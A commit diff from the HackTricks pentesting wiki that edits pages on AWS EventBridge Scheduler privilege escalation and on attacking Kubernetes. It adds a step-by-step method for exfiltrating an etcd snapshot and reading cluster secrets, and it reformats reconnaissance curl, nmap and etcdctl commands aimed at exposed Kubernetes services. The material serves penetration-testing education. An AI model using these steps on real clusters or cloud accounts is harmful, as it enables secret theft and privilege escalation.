GITBOOK-700: No subject

HackTricks-wiki · Nov 5, 2024 · 27876bd · 27876bd
1 parent a6d6239
commit 27876bd
Show file tree

Hide file tree

Showing 3 changed files with 57 additions and 25 deletions.
diff --git a/...ing-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/...ing-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
@@ -19,18 +19,18 @@ Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png"
 
 EventBridge Scheduler can be used for privilege escalation by scheduling calls to various AWS services. By leveraging its ability to invoke services on a scheduled basis, users with sufficient permissions can escalate privileges. Here are some of the key actions EventBridge Scheduler can trigger using templated targets:
 
-- Lambda: lambda:InvokeFunction - Invoke Lambda functions on a schedule.
-- CodeBuild: codebuild:StartBuild - Start AWS CodeBuild projects.
-- CodePipeline: codepipeline:StartPipelineExecution - Trigger AWS CodePipeline executions.
-- ECS: ecs:RunTask - Run ECS tasks.
-- EventBridge: events:PutEvents - Put events into EventBridge.
-- Inspector: inspector:StartAssessmentRun - Start Amazon Inspector assessments.
-- Kinesis: kinesis:PutRecord - Put records into Kinesis streams.
-- Firehose: firehose:PutRecord - Put records into Firehose delivery streams.
-- SageMaker: sagemaker:StartPipelineExecution - Start SageMaker pipeline executions.
-- SNS: sns:Publish - Publish messages to SNS topics.
-- SQS: sqs:SendMessage - Send messages to SQS queues.
-- Step Functions: states:StartExecution - Start executions of AWS Step Functions.
+* Lambda: lambda:InvokeFunction - Invoke Lambda functions on a schedule.
+* CodeBuild: codebuild:StartBuild - Start AWS CodeBuild projects.
+* CodePipeline: codepipeline:StartPipelineExecution - Trigger AWS CodePipeline executions.
+* ECS: ecs:RunTask - Run ECS tasks.
+* EventBridge: events:PutEvents - Put events into EventBridge.
+* Inspector: inspector:StartAssessmentRun - Start Amazon Inspector assessments.
+* Kinesis: kinesis:PutRecord - Put records into Kinesis streams.
+* Firehose: firehose:PutRecord - Put records into Firehose delivery streams.
+* SageMaker: sagemaker:StartPipelineExecution - Start SageMaker pipeline executions.
+* SNS: sns:Publish - Publish messages to SNS topics.
+* SQS: sqs:SendMessage - Send messages to SQS queues.
+* Step Functions: states:StartExecution - Start executions of AWS Step Functions.
 
 These are just some of the templated actions EventBridge Scheduler can perform. However, by using universal targets, many other actions across AWS services can be invoked. Universal targets allow for more extensive API operations beyond the templated list.
 
@@ -40,12 +40,11 @@ More info EventBridge Scheduler in:
 [eventbridgescheduler-enum.md](../aws-services/eventbridgescheduler-enum.md)
 {% endcontent-ref %}
 
-### `sts:AssumeRole`, `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)
+### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)
 
 Users with `sts:AssumeRole`, `iam:PassRole`, and `scheduler:CreateSchedule or scheduler:UpdateSchedule` permissions can escalate privileges by leveraging the EventBridge Scheduler to invoke services using a role with higher privileges.
 
-With these permissions, an attacker can assume a role with elevated privileges and pass that role to EventBridge Scheduler when creating or updating a schedule. The schedule can be configured to perform any of the actions listed previously, such as invoking Lambda functions, starting ECS tasks, triggering CodePipeline executions, or any operation of the 270 AWS services supported by EventBridge Scheduler. By scheduling these actions, an attacker could abuse higher privileges to perform unauthorized operations across AWS services.
-\\
+With these permissions, an attacker can assume a role with elevated privileges and pass that role to EventBridge Scheduler when creating or updating a schedule. The schedule can be configured to perform any of the actions listed previously, such as invoking Lambda functions, starting ECS tasks, triggering CodePipeline executions, or any operation of the 270 AWS services supported by EventBridge Scheduler. By scheduling these actions, an attacker could abuse higher privileges to perform unauthorized operations across AWS services. \\
 
 For example, they could configure the schedule to invoke a Lambda function which is a templated action:
 
@@ -61,6 +60,7 @@ aws scheduler create-schedule \
 ```
 
 In addition to templated service actions, you can use universal targets in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "AdminAccessPolicy", using a role that has "putRolePolicy" policy:
+
 ```bash
 aws scheduler create-schedule \                                           
     --name GrantAdminToTargetRoleSchedule \
@@ -76,7 +76,6 @@ aws scheduler create-schedule \
 ## References
 
 * [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html)
-
 * [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html)
 
 {% hint style="success" %}

diff --git a/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md b/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
@@ -209,7 +209,7 @@ k8s-worker          Ready    <none>   93d   v1.19.1
 
 control-plane nodes have the **role master** and in **cloud managed clusters you won't be able to run anything in them**.
 
-#### Read secrets from etcd
+#### Read secrets from etcd 1
 
 If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets.
 
@@ -251,6 +251,39 @@ Output:
 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]
 ```
 
+#### Read secrets from etcd 2 [from here](https://www.linkedin.com/posts/grahamhelton\_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm\_source=share\&utm\_medium=member\_android)
+
+1. Create a snapshot of the **`etcd`** database. Check [**this script**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) for further info.
+2. Transfer the **`etcd`** snapshot out of the node in your favourite way.
+3. Unpack the database:
+
+{% code overflow="wrap" %}
+```bash
+mkdir -p restore ; etcdutl snapshot restore etcd-loot-backup.db \ --data-dir ./restore
+```
+{% endcode %}
+
+4. Start **`etcd`** on your local machine and make it use the stolen snapshot:
+
+{% code overflow="wrap" %}
+```bash
+etcd \ --data-dir=./restore \ --initial-cluster=state=existing \ --snapshot='./etcd-loot-backup.db'
+
+```
+{% endcode %}
+
+5. List all the secrets:
+
+```bash
+etcdctl get "" --prefix --keys-only | grep secret 
+```
+
+6. Get the secfrets:
+
+```bash
+ etcdctl get /registry/secrets/default/my-secret
+```
+
 ### Static/Mirrored Pods Persistence
 
 _Static Pods_ are managed directly by the kubelet daemon on a specific node, without the API server observing them. Unlike Pods that are managed by the control plane (for example, a Deployment); instead, the **kubelet watches each static Pod** (and restarts it if it fails).

diff --git a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md b/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
@@ -64,7 +64,7 @@ This is the **API Kubernetes service** the administrators talks with usually usi
 
 **Common ports: 6443 and 443**, but also 8443 in minikube and 8080 as insecure.
 
-```
+```bash
 curl -k https://<IP Address>:(8|6)443/swaggerapi
 curl -k https://<IP Address>:(8|6)443/healthz
 curl -k https://<IP Address>:(8|6)443/api/v1
@@ -84,7 +84,7 @@ If you find this service exposed you might have found an **unauthenticated RCE**
 
 #### Kubelet API
 
-```
+```bash
 curl -k https://<IP address>:10250/metrics
 curl -k https://<IP address>:10250/pods
 ```
@@ -104,22 +104,22 @@ done
 
 #### kubelet (Read only)
 
-```
+```bash
 curl -k https://<IP Address>:10255
 http://<external-IP>:10255/pods
 ```
 
 ### etcd API
 
-```
+```bash
 curl -k https://<IP address>:2379
 curl -k https://<IP address>:2379/version
 etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
 ```
 
 ### Tiller
 
-```
+```bash
 helm --host tiller-deploy.kube-system:44134 version
 ```
 
@@ -129,15 +129,15 @@ You could abuse this service to escalate privileges inside Kubernetes:
 
 Service useful to gather metrics.
 
-```
+```bash
 curl -k https://<IP Address>:4194
 ```
 
 ### NodePort
 
 When a port is exposed in all the nodes via a **NodePort**, the same port is opened in all the nodes proxifying the traffic into the declared **Service**. By default this port will be in in the **range 30000-32767**. So new unchecked services might be accessible through those ports.
 
-```
+```bash
 sudo nmap -sS -p 30000-32767 <IP>
 ```
 
@@ -155,7 +155,7 @@ The ETCD stores the cluster secrets, configuration files and more **sensitive da
 
 If the ETCD can be accessed anonymously, you may need to **use the** [**etcdctl**](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md) **tool**. The following command will get all the keys stored:
 
-```
+```bash
 etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
 ```